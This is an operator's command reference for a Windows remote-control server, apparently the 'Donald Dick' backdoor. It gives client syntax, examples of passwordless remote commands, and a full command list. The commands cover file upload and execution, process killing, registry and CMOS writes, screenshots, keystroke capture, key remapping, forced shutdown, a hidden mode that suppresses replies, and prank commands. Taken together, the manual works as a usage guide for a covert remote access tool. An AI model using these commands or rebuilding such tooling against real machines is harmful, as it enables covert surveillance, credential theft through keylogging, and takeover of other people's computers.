DISCLAIMER:

The authors accept NO LIABILITY for damages of any kind caused by use of this
software. The authors make NO WARRANTY with respect to this software.
This software is provided "AS IS", and you, its user, assume the entire risk
as to its quality and accuracy.



Command line parameters:

<protocol> <address> <port> <options> <command> [<param1> <param2>...<paramN>]

where 

<protocol>:   0 - SPX, 1 - TCP
<address>:    target taddress; TCP example: 127.0.0.1; SPX example: 22FA6700B
<port>:       port (socket); 0 - use default (23476 for TCP, 0x9014 for SPX)
<options>:     d=N, where N is delay before execution, ms
               D=N, where N is delay after execution (has no meaning if repeat
                    count is unspecified or 1), ms
               r=N, where N is repeat count (result is sent back for the last
                    executed command only)
               p=X, where X is 32 characters of password; it is recommended
                    that this option will be last in the string
<command>:    see below
<param1>...<paramN>: parameters if required


examples:

  get info (no password is required):

    client.exe 0 220482120A8 0 " " 0 info
    client.exe 1 212.20.33.8 " " 0 info

  upload file (no password is required):

    client.exe 1 212.20.33.8 " " 0 upload "c:\program files\e.exe" e.exe

  set binary value in the registry (no password is required):

    client.exe 0 220482120A8 0 " " 0 setregbin hklm\system\aaa test F01456

  set system colors (no password is required):

    client.exe 0 220482120A8 0 " " 0 setcolors "2 3" "255 0 0 128 128 0"

  open CDROM tray 10 times (assume that user will close it),
    delay before execution 20 sec, after that - 120 s, no password is required

    client.exe 0 220482120A8 0 "r=10 d=20000 D=120000" opencd

    client will wait for reply of the last command, it is long - you may
    ctrl-break it, the request will be executed anyway




Commands:


Server:

    ECHO, HIDDEN, INFO, PORT, RAISE, REGISTER, SETPASS,
    TERMINATE, TESTFAR, TESTNEAR, UNINSTALL, UPGRADE

Chat:
    CHATCLR, CHATRD, CHATRDNV, CHATSIZE, CHATWR, CHATWRNV

File system:

    CREATEDIR, DIR, DOWNLOAD, ERASE, GETDRIVES, RCOPY,
    REMOVEDIR, RENAME, SETFTEQ, SETFTIME, UPLOAD

Processes:

    FORGETALL, GETPCLASS, GETPID, GETPROCLIST, GETSUSPTHR, GETTHRLIST, KILL,
    KILLBYNAME, KILLTHR, RESUME, RESUMEALL, RUN, SETPCLASS, SUSPEND

Registry:

    REGDELK, REGDELV, REGKEY, REGNEWK, REGSETBIN,
    REGSETDWORD, REGSETSZ, REGVAL, REGSETVAL

System:

    ANYCALL, GETTIME, LOGOFF, POWEROFF, REBOOT, SETCOMPNAME, SETTIME,
    SHUTDOWN, SPI, SYSINFO

Keyboard:

    KEYBSAVE, KEYBUF, KEYMAP, KEYSTROKE

Windows:

    CHILDWINDOWS, GETCOLORS, GETWINDOW, HWNDDESKTOP, SCREENSHOT,
    SETCAPTION, SETCOLORS, WINDOWS, WINMSG, WINSHOT

Hardware:
    RDCMOS, WRCMOS

Jokes:

    CLOSECD, MONOFF, MONON, MSGBOX, OPENCD, PLAY


All:

ANYCALL <flags> <module name/selector> <function name/offset>
        [<param 1> [...<param N>]]

    -- not tested yet --
        Call any function - very cool but dangerous.
        Param may be immediate data (number or arrays) or may start with 'p';
        in this case they are data and/or buffers which param points to.
        If param contains only 'p' then pointer is NULL.
        API function is called inside thread which processes the request.
        Flags:
        bit 0,1: 0 - use LoadLibrary( module name ),
                     GetProcAddress( function name) and perform near call,
                 1 - use offset (selector must be any value)
                     and perform near call,
                 2 - use selector, offset and perform far call.
        bit 2: params push order, 0 - right->left (C), 1 - left->right (PASCAL)
               if bits 4,5 are not zero then this bit is ignored.
        bit 3: who removes params from the stack, 0 - caller, 1 - callee.
        bit 4,5: register optimization (first params are passed in
               register set):
               0 - none,
           n/i 1 - Watcom C, the set is EAX, EDX, EBX, ECX or EDX:EAX, ECX:EBX,
           n/i 2 - Delphi, the set is EAX, EDX, ECX.
        bit 6: how to pass return value buffer's address for arrays:
               0 - Watcom C - address is passed in ESI
               1 - Delphi, when register optimization is used - address is
                   passed in the last register in the set if parameters count
                   less than 3 or in the first position on the stack;
                   if no optimization is set in bits 4,5 then address
                   is passed in the first position on the stack
        bit 8-31: buffer size to allocate on the stack for the return value;
               if zero then return value is expected in EDX:EAX and bit 6
               is ignored.

CHATCLR [<non-volatile flag>]              Clears chat room; if non-volatile
                                           flag is nonzero then non-volatile
                                           chat room is cleared
CHATRD [<index>]                           Reads messages from chat room
                                           starting with index or all of them
                                           if index 0 or none;
                                           message format: <index> <author>
                                           <date/time> <message>
                                           index of message is incremented
                                           continiuosly since first message
                                           in chat the room even the room
                                           was cleared
CHATRDNV [<index>]                         same as CHATRD but operates with
                                           non-volatile room
CHATSIZE [<kilobytes>]                     Get/set chat room size, default
                                           size is 8K; chat room is cleared
CHATWR <message> [...<message>]            Add message(s) to the chat room
CHATWRNV <message> [...<message>]          same as CHATWR but operates with
                                           non-volatile room; non-volatile
                                           chat room is limited to 2K
CHILDWINDOWS <remote window handle>        Get child windows of window
CLOSECD
CREATEDIR <remote directory> [...<remote directory>]
                                           Note: returns as many result
                                           strings as parameters passed.
DIR <remote directory>                     Don't forget file mask!
DOWNLOAD <remote file> <local file>
ECHO                                       Server sends received packet back
ERASE <<force flag> <remote file/dir>> [...<<force flag> <remote file/dir>>]
                                           force flag: /0 or /1; /1 - erase
                                           file even read only or directory
                                           with all files and subdirectories.
                                           Note: returns as many strings as
                                           parameters passed.
FORGETALL                                  Clears suspended thread table
GETCOLORS <color indexes>                  Get system colors
GETDRIVES                                  Get list of drives
GETPCLASS <remote process id>              Get priority class
GETPID                                     Get server's process id
GETPROCLIST                                Get list of processes
GETSUSPTHR                                 Get list of suspended threads in
                                           the form: <process id> <thread id>
GETTHRLIST <remote process id>             Get list of threads for specified
                                           process
GETTIME                                    Returns date and time
GETWINDOW <window handle (hex)> <mode>     Returns window handle(s) relative
                                           to the given window (see Win32 API
                                           documentation on GetWindow()
                                           for <mode> description)
HIDDEN <0/1>                               hidden mode on/off
                                           in hidden mode server does not
                                           reply on all commands if error
                                           occured before their processing
                                           (reception, password verification,
                                           function code verification)
                                           Returns current mode
HWNDDESKTOP                                Returns desktop window handle
INFO                                       Returns some info
KEYBSAVE [<0/1>]    not implemented        without parameter or if that one
                                           is nonzero, saves current lookup
                                           table; if parameter is zero,
                                           clears saved table
KEYBUF [<keystrokes> [<from keystroke>]]   Returns captured scan codes;
                                           if <from keystroke> parameter is
                                           absent then returns last keystrokes;
                                           only the following scan codes are
                                           captured: 02..1C, 1E..29, 2B..35,
                                           37, 39, 47..53 and 9C, B5 - these
                                           codes denote extended keys with
                                           secondary scan codes 1C and 35
KEYMAP [<index newcode [...newcode]>       Remaps keys and return current map;
       ...<index newcode [...newcode]>]      this command sets elements in
                                        lookup table;
                                        lookup table contains 256 scan codes in
                                        range 0..127; first half of table is
                                        used to remap regular keys, second one
                                        is used to remap extended keys (those
                                        keys produce two-byte scan codes, first
                                        code is E0);  normally,
                                        elements at indexes 0 and 128 have
                                        code 0, at 1 and 129 - 1 and so on;
                                        key is disabled if code is 0;
                                        note that it is impossible to remap
                                        pause/break key
KEYSTROKE <virtual key code> [...<virtual key code>]  simulates keystrokes
KILL <remote process id> [...<remote process id>]
                                           Note: returns as many result
                                           strings as parameters passed.
KILLBYNAME <remote executable file> [...<remote executable file>]
                                           Note: returns as many result
                                           strings as parameters passed.
KILLTHR <process id> <thread id> [...<thread id>]
                                           Kills thread(s) (under Win95 may
                                           not be done immediately)
                                           Note: returns as many result
                                           strings as thread ids passed.
LOGOFF                                     Performs logoff for workstation
MONOFF                                     Turns monitor off
MONON                                      Turns monitor on
MSGBOX <caption> <message> <flags (hex)>   Displays message box, see below 
                                           for the description of <flags>
OPENCD
PLAY <remote wave file>
PORT <protocol name> GET/[<port>...<port>] Get or set port numbers in registry,
                                           server must be restarted to
                                           apply changes; protocol name
                                           may be SPX or TCP; <port> is
                                           a number or D (default port)
                                           always returns port numbers
POWEROFF                                   Performs power off
RCOPY <source remote file> <destination remote file> [...<source remote file> <destination remote file>]
                                           Note: returns result string for
                                           each parameter pair.
RDCMOS <start> <count>           Reads CMOS data, start - index in range 0..255
RAISE                            Raises an exception - for debug purposes only
REBOOT
REGDELK <registry key> <subkey name>       Deletes subkey from the registry
REGDELV <registry key> <value name>        Deletes value from subkey
REGISTER [<registration data>]          Registers server
                                        Returns status in the first line,
                                        registration info in the second line,
                                        registration status in the third line
                                        if registration data is present
REGKEY <registry key>                   Displays subkeys in key
REGNEWK <registry key> <subkey name>    Creates new subkey
REGSETBIN <registry key> <value name> <value>    Sets binary value, value
                                        is the sequence of hex digits
                                        without any spaces
REGSETDWORD <registry key> <value name> <value>  Sets DWORD value
REGSETSZ <registry key> <value name> <value>     Sets string value
REGSETVAL <registry key> <value type (hex)> <value name> <value>
                                        Sets value of any type. Value
                                        is the sequence of hex digits
                                        without any spaces
REGVAL <registry key>                   Key must contain "hklm","hkus",
                                       "hkcu","hkcr" first
REMOVEDIR <remote directory> [...<remote directory>]
                                        Note: returns as many result
                                        strings as parameters passed.
RENAME <remote file name> <new remote file name> [...<remote file name> <new remote file name>]
                                        Note: returns result string for
                                        each parameter pair.
RESUME <process id> <thread id> [...<thread id>]
                                        Resumes thread(s)
                                        Note: returns as many result
                                        strings as thread ids passed.
RESUMEALL                               Resumes all suspended threads
RUN <remote executable file> [...<remote executable file>]
                                        Note: returns as many result
                                        strings as parameters passed.
SCREENSHOT [<pathname> [<param 1> [...<param N>]]]
SETCAPTION <window handle (hex)> <caption>
SETCOLORS <color indexes> <color values>
SETCOMPNAME <computer name>
SETFTEQU <remote file> <reference remote file> Sets date/time of file
                                               equal to reference file
SETFTIME <remote file> <H M S D M Y>
SETPASS [<password>]                      Sets or removes password
SETPCLASS <remote process id> <priority class> Set priority class
SETTIME <H M S D M Y>
SHUTDOWN
SPI <action> <uiparam> [<pvparam>]           Get/set system parameters info
SUSPEND <process id> <thread id> [...<thread id>]
                                             Suspends thread(s) (under Win95
                                             may not be done immediately;
                                             suspension means entering
                                             continious loop so thread
                                             consumes cpu power)
                                             Note: returns as many result
                                             strings as thread ids passed.
SYSINFO
TERMINATE                                    Server terminates itself
TESTFAR               Returns far address of far test function - debug only
TESTNEAR              Returns near address of near test function - debug only
UNINSTALL             Completely uninstalls donald dick server
UPLOAD <remote file> <local file>
UPGRADE <remote file>                        restarts server anyway
WINDOWS                                      Get window list
WINMSG <window handle (hex)> <message> <wparam> <lparam>
                                             params may be numbers or may
                                             start with 'p'; in this case
                                             they are data and/or buffers
                                             which lparam and/or wparam
                                             points to
WINSHOT <window handle (hex)> [<pathname> [<param 1> [...<param N>]]]
                                             screenshot for the specified
                                             window or for the foreground
                                             window if handle is 0
WRCMOS <start> <count> <data>


-------------
Priority classes (hex):
  NORMAL_PRIORITY_CLASS       00000020
  IDLE_PRIORITY_CLASS         00000040
  HIGH_PRIORITY_CLASS         00000080
  REALTIME_PRIORITY_CLASS     00000100

Message box flags (hex):
  MB_OK                       00000000
  MB_OKCANCEL                 00000001
  MB_ABORTRETRYIGNORE         00000002
  MB_YESNOCANCEL              00000003
  MB_YESNO                    00000004
  MB_RETRYCANCEL              00000005
  MB_ICONHAND                 00000010
  MB_ICONQUESTION             00000020
  MB_ICONEXCLAMATION          00000030
  MB_ICONASTERISK             00000040
  MB_DEFBUTTON1               00000000
  MB_DEFBUTTON2               00000100
  MB_DEFBUTTON3               00000200
  MB_DEFBUTTON4               00000300
  MB_APPLMODAL                00000000
  MB_SYSTEMMODAL              00001000
  MB_TASKMODAL                00002000
  MB_HELP                     00004000
  MB_NOFOCUS                  00008000
  MB_SETFOREGROUND            00010000
  MB_DEFAULT_DESKTOP_ONLY     00020000
  MB_TOPMOST                  00040000
  MB_RIGHT                    00080000
  MB_RTLREADING               00100000

System color indexes:
  COLOR_SCROLLBAR              0
  COLOR_BACKGROUND             1
  COLOR_ACTIVECAPTION          2
  COLOR_INACTIVECAPTION        3
  COLOR_MENU                   4
  COLOR_WINDOW                 5
  COLOR_WINDOWFRAME            6
  COLOR_MENUTEXT               7
  COLOR_WINDOWTEXT             8
  COLOR_CAPTIONTEXT            9
  COLOR_ACTIVEBORDER          10
  COLOR_INACTIVEBORDER        11
  COLOR_APPWORKSPACE          12
  COLOR_HIGHLIGHT             13
  COLOR_HIGHLIGHTTEXT         14
  COLOR_BTNFACE               15
  COLOR_BTNSHADOW             16
  COLOR_GRAYTEXT              17
  COLOR_BTNTEXT               18
  COLOR_INACTIVECAPTIONTEXT   19
  COLOR_BTNHIGHLIGHT          20
  COLOR_3DDKSHADOW            21
  COLOR_3DLIGHT               22
  COLOR_INFOTEXT              23
  COLOR_INFOBK                24

Registry value types:

  REG_NONE                        0    No value type
  REG_SZ                          1    nul terminated string
  REG_EXPAND_SZ                   2    nul terminated string with
                                       environment variable references
  REG_BINARY                      3    Free form binary
  REG_DWORD                       4    32-bit number
  REG_DWORD_LITTLE_ENDIAN         4    32-bit number (same as REG_DWORD)
  REG_DWORD_BIG_ENDIAN            5    32-bit number
  REG_LINK                        6    Symbolic Link
  REG_MULTI_SZ                    7    Multiple strings
  REG_RESOURCE_LIST               8    Resource list in the resource map
  REG_FULL_RESOURCE_DESCRIPTOR    9    Resource list in the hardware description
  REG_RESOURCE_REQUIREMENTS_LIST 10

Virtual key codes:

  VK_LBUTTON        0x01
  VK_RBUTTON        0x02
  VK_CANCEL         0x03
  VK_MBUTTON        0x04
  VK_BACK           0x08
  VK_TAB            0x09
  VK_CLEAR          0x0C
  VK_RETURN         0x0D
  VK_SHIFT          0x10
  VK_CONTROL        0x11
  VK_MENU           0x12
  VK_PAUSE          0x13
  VK_CAPITAL        0x14
  VK_ESCAPE         0x1B
  VK_SPACE          0x20
  VK_PRIOR          0x21
  VK_NEXT           0x22
  VK_END            0x23
  VK_HOME           0x24
  VK_LEFT           0x25
  VK_UP             0x26
  VK_RIGHT          0x27
  VK_DOWN           0x28
  VK_SELECT         0x29
  VK_PRINT          0x2A
  VK_EXECUTE        0x2B
  VK_SNAPSHOT       0x2C
  VK_INSERT         0x2D
  VK_DELETE         0x2E
  VK_HELP           0x2F
  VK_0 thru VK_9 are the same as ASCII '0' thru '9' (0x30 - 0x39)
  VK_A thru VK_Z are the same as ASCII 'A' thru 'Z' (0x41 - 0x5A)
  VK_LWIN           0x5B
  VK_RWIN           0x5C
  VK_APPS           0x5D
  VK_NUMPAD0        0x60
  VK_NUMPAD1        0x61
  VK_NUMPAD2        0x62
  VK_NUMPAD3        0x63
  VK_NUMPAD4        0x64
  VK_NUMPAD5        0x65
  VK_NUMPAD6        0x66
  VK_NUMPAD7        0x67
  VK_NUMPAD8        0x68
  VK_NUMPAD9        0x69
  VK_MULTIPLY       0x6A
  VK_ADD            0x6B
  VK_SEPARATOR      0x6C
  VK_SUBTRACT       0x6D
  VK_DECIMAL        0x6E
  VK_DIVIDE         0x6F
  VK_F1             0x70
  VK_F2             0x71
  VK_F3             0x72
  VK_F4             0x73
  VK_F5             0x74
  VK_F6             0x75
  VK_F7             0x76
  VK_F8             0x77
  VK_F9             0x78
  VK_F10            0x79
  VK_F11            0x7A
  VK_F12            0x7B
  VK_F13            0x7C
  VK_F14            0x7D
  VK_F15            0x7E
  VK_F16            0x7F
  VK_F17            0x80
  VK_F18            0x81
  VK_F19            0x82
  VK_F20            0x83
  VK_F21            0x84
  VK_F22            0x85
  VK_F23            0x86
  VK_F24            0x87
  VK_NUMLOCK        0x90
  VK_SCROLL         0x91
  VK_LSHIFT         0xA0
  VK_RSHIFT         0xA1
  VK_LCONTROL       0xA2
  VK_RCONTROL       0xA3
  VK_LMENU          0xA4
  VK_RMENU          0xA5
  VK_PROCESSKEY     0xE5
  VK_ATTN           0xF6
  VK_CRSEL          0xF7
  VK_EXSEL          0xF8
  VK_EREOF          0xF9
  VK_PLAY           0xFA
  VK_ZOOM           0xFB
  VK_NONAME         0xFC
  VK_PA1            0xFD
  VK_OEM_CLEAR      0xFE

Plugin parameters for SCREEN/WINSHOT: [<pathname> [<param 1> [...<param N>]]]
  Standard JPEG plugin: filename jpegcomp.dll, param 1 - image
  quality, 1-100, default is 75.

------------------------------------------------------------------
Send all questions, comments and suggestions to donalddick@mail.ru
